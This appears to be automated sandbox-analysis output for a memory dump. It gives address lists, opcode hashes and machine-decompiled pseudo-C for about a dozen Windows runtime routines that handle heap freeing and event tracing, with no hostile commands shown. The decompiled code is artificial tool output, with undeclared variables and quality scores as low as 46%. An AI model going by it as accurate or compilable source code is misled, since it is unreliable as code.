0x035f9195
0x035f9198
0x035f9198
0x035f9198
0x035f919a
0x00000000
0x00000000
0x0365371f
0x03653721
0x03653727
0x0365372f
0x03653733
0x03653735
0x03653738
0x0365373b
0x0365373d
0x03653740
0x00000000
0x03653746
0x03653746
0x03653749
0x00000000
0x0365374f
0x0365374f
0x03653751
0x03653757
0x03653759
0x0365375c
0x0365375c
0x0365375e
0x0365375e
0x03653761
0x03653764
0x00000000
0x00000000
0x03653766
0x03653768
0x036537a3
0x036537a3
0x036537a5
0x036537a7
0x036537ad
0x036537b0
0x036537b2
0x036537bc
0x036537c2
0x036537c2
0x036537b2
0x035f9187
0x035f9187
0x035f918a
0x035f918d
0x035f918f
0x035f9192
0x035f9195
0x00000000
0x035f9195
0x00000000
0x0365376a
0x0365376a
0x0365376a
0x0365376c
0x0365376c
0x0365376f
0x03653775
0x00000000
0x00000000
0x03653777
0x03653779
0x03653782
0x03653787
0x03653789
0x03653790
0x03653790
0x0365378b
0x0365378b
0x0365378b
0x03653792
0x03653795
0x00000000
0x03653795
0x00000000
0x03653779
0x03653798
0x00000000
0x03653798
0x00000000
0x03653768
0x0365379b
0x0365379b
0x03653751
0x03653749
0x00000000
0x03653740
0x035f91a0
0x035f91a3
0x035f91a9
0x035f91b0
0x00000000
0x035f91b0
0x035f9187
0x035f91b4
0x035f91b4
0x035f91bb
0x035f91c0
0x035f91c5
0x035f91c7
0x036537da
0x035f91cd
0x035f91cd
0x035f91cd
0x035f91d2
0x035f91d5
0x035f9239
0x035f9239
0x035f91d7
0x035f91db
0x035f91e1
0x035f91e7
0x035f91fd
0x035f9203
0x035f921e
0x035f9223
0x00000000
0x035f9205
0x035f9205
0x035f9208
0x035f920c
0x035f9214
0x035f9214
0x035f920c
0x035f91e9
0x035f91e9
0x035f91ee
0x035f91f3
0x035f91f3
0x035f91f3
0x035f91e7
0x00000000
0x00000000
0x00000000
0x035f9134
0x035f9125
0x035f911d
0x035f914e
0x035f90d1
0x035f90d1
0x035f90d3
0x035f90d6
0x035f90d8
0x00000000
0x035f90d8
0x035f90cf

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0831ccb5cb4cfe7d9e6a47caa20dfc4ad41834d4df0948d1d56f0cab2cb4a6
Instruction ID: 3fee9cbd47ab199d29eb65580fdcbfe8b9992d976b89253f6123e7eed5957fd0
Opcode Fuzzy Hash: 9f0831ccb5cb4cfe7d9e6a47caa20dfc4ad41834d4df0948d1d56f0cab2cb4a6
Instruction Fuzzy Hash: 1C01A472501A048FC325DF14E840B16B7ADFB86724F29446AE705CF7A5D774DC41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0368C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0368C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03639910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E036395B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E036395D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E036395D0();
				return L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0368c458
0x0368c45d
0x0368c466
0x0368c468
0x0368c469
0x0368c46a
0x0368c46b
0x0368c46e
0x0368c46f
0x0368c471
0x0368c476
0x0368c476
0x0368c47c
0x0368c47e
0x0368c480
0x0368c480
0x0368c483
0x0368c484
0x0368c486
0x0368c488
0x0368c48f
0x0368c491
0x0368c493
0x0368c493
0x0368c48f
0x0368c498
0x0368c49e
0x0368c4ad
0x0368c4ad
0x0368c4b2
0x0368c4b4
0x0368c4cd

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 14f49f349c18cce8f00f50263e1dce4759c908e05c8c51e193803ea7b1ce576a
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: F1019276140605BFD721EF65CD80E62F77DFF553A0F044529F11446660CB61ACE0CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 036C4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E036C4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03612280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03612280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x36e86ac);
					E035FF900(0x36e86d4, _t28);
					E0360FFB0(0x36e86ac, _t28, 0x36e86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0360FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x036c401a
0x036c401e
0x036c4023
0x036c4028
0x036c4029
0x036c402b
0x036c402f
0x036c4043
0x036c4046
0x036c4051
0x036c4057
0x036c405f
0x036c4062
0x036c4067
0x036c406f
0x036c407c
0x036c407c
0x036c408c
0x036c408c
0x036c4097

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788fb544662055c3a4de2a5353f65f8f91f93b2219b9e896cd52af936bc22652
Instruction ID: 98b26034aad97696090e4f0bdf9d6d22d7f6a8c95f808e0f202dcde8e0a16daa
Opcode Fuzzy Hash: 788fb544662055c3a4de2a5353f65f8f91f93b2219b9e896cd52af936bc22652
Instruction Fuzzy Hash: 900184763416497FC212EB79CE84E17F7ACFB45650B040629F5088BA51CB24EC21C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 036B138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E036B138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x36ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0363FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03617D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0363B640(E03639AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x036b138a
0x036b138a
0x036b1399
0x036b13a3
0x036b13a8
0x036b13aa
0x036b13b5
0x036b13bb
0x036b13c3
0x036b13c6
0x036b13c9
0x036b13d4
0x036b13e6
0x036b13d6
0x036b13df
0x036b13df
0x036b13f1
0x036b13f2
0x036b13f4
0x036b13f9
0x036b140e

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383b1ad448cf434e03c152ef9c117dfc5d5e7b6a9020356627c708da9ef50bc3
Instruction ID: 13bd87693e153a0c33f575669a8366529cc766b16ce53ad97ba0a6e9e55c992a
Opcode Fuzzy Hash: 383b1ad448cf434e03c152ef9c117dfc5d5e7b6a9020356627c708da9ef50bc3
Instruction Fuzzy Hash: C8014075E10318AFCB14DFA9D841AAEB7B8EF45710F04405AB904AB280E6749A51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036B14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E036B14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x36ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0363FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03617D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0363B640(E03639AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x036b14fb
0x036b14fb
0x036b150a
0x036b1514
0x036b1519
0x036b151b
0x036b1526
0x036b152c
0x036b1534
0x036b1537
0x036b153a
0x036b1545
0x036b1557
0x036b1547
0x036b1550
0x036b1550
0x036b1562
0x036b1563
0x036b1565
0x036b156a
0x036b157f

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff570eb9469dcd5e0d11b8915e7ccf99412db4626db699ddf5570545e6602c4
Instruction ID: a8daf110eeb4ba4746d2d92581ffcfaec7623a9cff19e82776afad2b8a997226
Opcode Fuzzy Hash: aff570eb9469dcd5e0d11b8915e7ccf99412db4626db699ddf5570545e6602c4
Instruction Fuzzy Hash: 5F018075A00248AFCB00DF68D841FAEB7B8EF45700F00405AB914EF380D670DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 035F58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E035F58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x36ed360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x35d5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E035F5943() != 0 &&  *0x36e5320 > 5) {
					E03677B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03677B5E( &_v28, _t28);
					_t11 = E03677B9C(0x36e5320, 0x35dbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0363B640(_t11, _t17, _v8 ^ _t29, 0x35dbf15, _t27, _t28);
			}

0x035f58fb
0x035f58fe
0x035f5906
0x035f590a
0x035f593c
0x035f593c
0x035f590c
0x035f590c
0x035f5911
0x00000000
0x035f5913
0x035f5913
0x035f5913
0x035f5911
0x035f591d
0x03651035
0x0365103c
0x0365103f
0x03651056
0x03651056
0x035f593b

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d9342db77bebf1a15aed190986c1e2de10135e5c6a1ff0685b356054a3ce42
Instruction ID: 87071cb0684e6c2ae1e23a993526636b7bae5411260ab03fe0961c3b73632d79
Opcode Fuzzy Hash: 72d9342db77bebf1a15aed190986c1e2de10135e5c6a1ff0685b356054a3ce42
Instruction Fuzzy Hash: 48018435A006089FCB18EE69E9049BEB7B8FF46520F9904699A059B264EE30DD05C694

Uniqueness

Uniqueness Score: -1.00%

Function 036C1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036C1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E036C165E(__ebx, 0x36e8ae4, (__edx -  *0x36e8b04 >> 0x14) + (__edx -  *0x36e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x36e8b04 >> 0x14) + (__edx -  *0x36e8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E036BAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03617D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E036AFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x036c1074
0x036c1080
0x036c1082
0x036c108a
0x036c108f
0x036c1093
0x036c10ab
0x036c10ab
0x036c10c3
0x036c10cf
0x036c10e1
0x036c10d1
0x036c10da
0x036c10da
0x036c10e9
0x036c10f5
0x036c10f5
0x036c10fe

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a0957aef42b91835be2906a2d68f92bb3d242a34aa67e0f1ac2f280fda74c3
Instruction ID: 22bb913029d9308e67d313121057df5da202897694e04e0b41fd34ad91500d5d
Opcode Fuzzy Hash: d9a0957aef42b91835be2906a2d68f92bb3d242a34aa67e0f1ac2f280fda74c3
Instruction Fuzzy Hash: 7D014C766147859FC710EF69CA00B2AB7E5EF85310F04861DF88587392EE30D955CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0360B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03617D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03677016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0360b037
0x0360b039
0x0360b03b
0x0360b040
0x0365a60e
0x00000000
0x00000000
0x0365a61d
0x0360b04b
0x0360b04e
0x0365a627
0x0365a634
0x00000000
0x00000000
0x0365a641
0x0365a653
0x0365a643
0x0365a64c
0x0365a64c
0x0365a65b
0x00000000
0x00000000
0x00000000
0x0365a66c
0x0360b057
0x0360b057
0x0360b057
0x0360b046
0x0360b046
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: b3e33ee610b147d75b5e3e141fb7f11a11b952d28a403625f9380d651ff85b66
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 35017C72205A849FD326C75CCA88F67B7ECEB45754F0D40A1F91ACBB91D728DC81C625

Uniqueness

Uniqueness Score: -1.00%

Function 036AFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E036AFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x36ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0363FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03617D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0363B640(E03639AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x036afe3f
0x036afe3f
0x036afe4e
0x036afe58
0x036afe5d
0x036afe5f
0x036afe6a
0x036afe72
0x036afe75
0x036afe78
0x036afe83
0x036afe95
0x036afe85
0x036afe8e
0x036afe8e
0x036afea0
0x036afea1
0x036afea3
0x036afea8
0x036afebd

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbab9280f4b635a9b8e03f938e5b251d9c4546802c810d9d28e933308825226
Instruction ID: 1d8981ac3c87dc7deb48e23361e090ea6656836fabee98f5515c0259c3990ef4
Opcode Fuzzy Hash: dfbab9280f4b635a9b8e03f938e5b251d9c4546802c810d9d28e933308825226
Instruction Fuzzy Hash: D7018475E00308AFCB14DFA9D845FAEB7B8EF45700F04406AB900AF391DA709911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 036AFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E036AFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x36ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0363FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03617D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0363B640(E03639AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x036afec0
0x036afec0
0x036afecf
0x036afed9
0x036afede
0x036afee0
0x036afeeb
0x036afef3
0x036afef6
0x036afef9
0x036aff04
0x036aff16
0x036aff06
0x036aff0f
0x036aff0f
0x036aff21
0x036aff22
0x036aff24
0x036aff29
0x036aff3e

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de03245d498f22702fb06cf5ee686c0717fc40d6db1ddeec357350ea6cfa100e
Instruction ID: c42a299afb0bdff7aadb9b21e182f10ba14930e6869c132f68f57af00ee5b5c8
Opcode Fuzzy Hash: de03245d498f22702fb06cf5ee686c0717fc40d6db1ddeec357350ea6cfa100e
Instruction Fuzzy Hash: B0018475E00708AFCB14DBA9D845FAEB7B8EF45700F04406ABA00AF390DA709A11CB99

Uniqueness

Uniqueness Score: -1.00%

Function 036C8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E036C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x36ed360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03617D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0363B640(E03639AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x036c8a62
0x036c8a71
0x036c8a79
0x036c8a82
0x036c8a85
0x036c8a89
0x036c8a8c
0x036c8a8f
0x036c8a92
0x036c8a95
0x036c8a9f
0x036c8ab1
0x036c8aa1
0x036c8aaa
0x036c8aaa
0x036c8abc
0x036c8abd
0x036c8abf
0x036c8ac4
0x036c8ada

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29b10e095adc56b4fb30a640e7c1930a160a7e4e2bc60579e58a69df4bd9747
Instruction ID: bf45a3be204317d1cba6b4cd8dae016de6ea177acb5ce99498ad8d82cbacffbb
Opcode Fuzzy Hash: e29b10e095adc56b4fb30a640e7c1930a160a7e4e2bc60579e58a69df4bd9747
Instruction Fuzzy Hash: BF012C75A1031CAFCB00DFA9D9419AEB7B8EF49310F14405AF904EB351D674A911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 036C8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E036C8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x36ed360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03617D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0363B640(E03639AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x036c8ed6
0x036c8ee5
0x036c8eed
0x036c8ef0
0x036c8efa
0x036c8f03
0x036c8f0c
0x036c8f15
0x036c8f24
0x036c8f27
0x036c8f31
0x036c8f43
0x036c8f33
0x036c8f3c
0x036c8f3c
0x036c8f4e
0x036c8f4f
0x036c8f51
0x036c8f56
0x036c8f69

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813e4637d13939e14b81e7a2d48b655cd3c10b32968429c1d9a370128736f9c2
Instruction ID: dc2a0afb83f2356718eebc5ed5689502280edfbf8cc80bf387491393f24f5022
Opcode Fuzzy Hash: 813e4637d13939e14b81e7a2d48b655cd3c10b32968429c1d9a370128736f9c2
Instruction Fuzzy Hash: 2F111B74E102599FDB04DFA8D541BAEFBF4FF48300F0442AAE918EB382E6749940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 035FDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E035FDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E035FDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E035FE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L035FE8B0(__ecx, _t14, 0xfff);
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x035fdb64
0x035fdb66
0x035fdb6b
0x035fdbaa
0x035fdb71
0x035fdb76
0x035fdb7a
0x035fdba3
0x035fdb7c
0x035fdb87
0x035fdb8b
0x03654fa1
0x03654fb3
0x03654fb8
0x035fdb91
0x035fdb96
0x035fdb98
0x035fdb98
0x035fdb8b
0x035fdb7a
0x035fdb9d
0x035fdba2

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 6bd1035ff14db7d8382aa29f34e6a7231d146d56b4380621161e0094913f39ba
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
